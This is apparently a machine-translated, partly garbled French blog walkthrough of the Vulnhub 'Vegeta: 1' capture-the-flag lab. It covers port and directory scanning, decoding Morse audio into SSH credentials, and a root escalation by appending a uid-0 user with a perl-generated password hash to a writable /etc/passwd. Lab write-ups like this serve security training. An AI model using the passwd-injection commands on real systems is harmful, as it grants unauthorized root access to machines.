当前位置:网站首页>Vulnhub Vegeta: 1
Vulnhub Vegeta: 1
2022-06-24 22:47:00 【Androméda】
Idées d'infiltration:
nmapScan----gobusterNumériser le catalogue du site----Décodage en ligne du Morse,Je l'ai.sshNom d'utilisateur Mot de passe----/etc/passwdÉcrire l'autorisation de l'utilisateur
Information sur l'environnement:
Cible:192.168.101.77
Machine d'attaque:192.168.101.34
Étapes spécifiques:
1、nmapScan
sudo nmap -sV -sC -p- 192.168.101.77
2、dirbNumériser le catalogue du site(Bunny hole)
dirb http://192.168.101.77Découvertehttp://192.168.101.77/robots.txt

(Il y a un trou de lapin)
Accès au navigateurhttp://192.168.101.77/robots.txt,Découverte/find_me

Accès au navigateur/find_me,Cliquez surfind_me.html,Et voir le code source de la page

view-source:http://192.168.101.77/find_me/find_me.html
Tirez vers le bas pour trouver un grand commentaire ( Ça ne sert à rien de copier et coller )

base64 Après le décodage, il y a encore un tas de codes inutiles ,La route est bloquée

3、gobusterNumériser le catalogue du site
gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txtScan to/bulma

http://192.168.101.77/bulma/C'est un catalogue.,Il y a un dossierhahahaha.wav

Télécharger pour écouter , On dirait un code Morse
4、Décodage en ligne du Morse,Je l'ai.sshNom d'utilisateur Mot de passe
J'ai trouvé un traducteur en ligne :Morse Code Audio Decoder | Morse Code World
Appuyez.uploadTéléchargerhahahaha.wav,Et appuyez surplay, Conversion automatique en message texte

Le résultat est
USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

Par nom d'utilisateurtrunks,Mot de passeu$3rEn courssshConnexion
ssh [email protected]
5、/etc/passwd Écrire une nouvelle demande d'utilisateur
Voir/home/trunks/.bash_history, Il y a une direction. /etc/passwd Écrire une action pour un nouvel utilisateur

Voir/etc/passwdPermissions de fichier pour
ls -al /etc/passwdDécouvertetrunksL'utilisateur a la permission d'écrire

RÉFÉRENCES/home/trunks/.bash_historyCommandes dans,D'abord.perl Générer un mot de passe utilisateur chiffré
perl -le 'print crypt("123456","addedsalt")'Dans la commande ci - dessus, Le mot de passe en texte clair de l'utilisateur est 123456
Puis le nouvel utilisateur testÉcrire/etc/passwd
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd
Enfin passer àtestUtilisateurs,Saisissez le mot de passe123456,ObtenirrootAutorité,Et dans/rootTrouvé dans le catalogueroot.txt
su - test

边栏推荐
- CDN principle
- win10或win11打印机无法打印
- 问题求解——嵌套列表
- Creating files, recursively creating directories
- Chapter 10 project stakeholder management
- See how sparksql supports enterprise level data warehouse
- nuScenes——数据集配置过程中遇到图像文件缺失或大小为0时的补救方法
- The core concept of JMM: happens before principle
- 结合源码剖析Oauth2分布式认证与授权的实现流程
- Future development of education industry of e-commerce Express
猜你喜欢
CA Zhouji - the first lesson in 2022 rust

Annotation

Online filing process

Data center basic network platform

Technology inventory: past, present and future of Message Oriented Middleware

ThreadLocal memory leak

Database transaction Transanction

AQS source code analysis

Basic principles of spanning tree protocol

NIO 零拷贝
随机推荐
Envoy obtain the real IP address of the client
ThreadLocal memory leak
2022年高处安装、维护、拆除考试模拟100题及模拟考试
Leetcode algorithm refers to offer II 027 Palindrome linked list
Introduction, installation and use of postman tool
O (n) complexity hand tear sorting interview questions | an article will help you understand counting sorting
Environment configuration | vs2017 configuring openmesh source code and environment
Analyze the implementation process of oauth2 distributed authentication and authorization based on the source code
See how sparksql supports enterprise data warehouse
【軟件工程】期末重點
Data communication foundation - Ethernet port mirroring and link aggregation
Valueerror: cannot take a larger sample than population when 'replace=false‘
Huada 04A operating mode / low power consumption mode
envoy获取客户端真实IP
【WSL】SSH 远程连接及宿主机端口转发配置
Chapter 10 project stakeholder management
Row and column differences in matrix construction of DX HLSL and GL glsl
CDN principle
How to automatically remove all . orig files in Mercurial working tree?
Basic principles of spanning tree protocol